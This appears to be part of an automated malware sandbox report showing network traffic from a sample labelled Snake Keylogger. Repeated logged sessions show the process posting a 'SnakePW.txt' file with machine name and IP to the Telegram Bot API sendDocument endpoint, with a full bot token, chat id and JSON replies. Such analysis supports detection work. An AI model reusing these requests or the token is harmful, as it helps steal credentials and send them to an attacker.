                            2022-06-26 07:33:05 UTC105INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66814,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228785,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            63192.168.2.549871149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:05 UTC106OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e4724548
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:05 UTC106OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 37 32 34 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e4724548Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:05 UTC107INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:05 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:05 UTC107INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66815,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228785,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            64192.168.2.549874149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:05 UTC108OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e4adde3e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:05 UTC108OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 61 64 64 65 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e4adde3eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:06 UTC108INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:06 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:06 UTC109INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66816,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            65192.168.2.549876149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:06 UTC109OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e4ebdb2f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:06 UTC110OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 65 62 64 62 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e4ebdb2fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:06 UTC110INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:06 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:06 UTC110INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66818,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            66192.168.2.549879149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:06 UTC111OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e52776dd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:06 UTC111OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 32 37 37 36 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e52776ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:07 UTC112INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:07 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:07 UTC112INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66819,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            67192.168.2.549881149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:07 UTC113OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e56c9a34
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:07 UTC113OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 36 63 39 61 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e56c9a34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:07 UTC113INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:07 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:07 UTC114INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66820,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228787,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            68192.168.2.549884149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:07 UTC114OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e5a36ffb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:07 UTC115OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 61 33 36 66 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e5a36ffbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:07 UTC115INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:07 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:07 UTC116INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66822,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228787,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            69192.168.2.549888149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:07 UTC116OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e5d7e39b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:07 UTC116OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 64 37 65 33 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e5d7e39bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:08 UTC117INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:08 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:08 UTC117INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66823,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228788,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
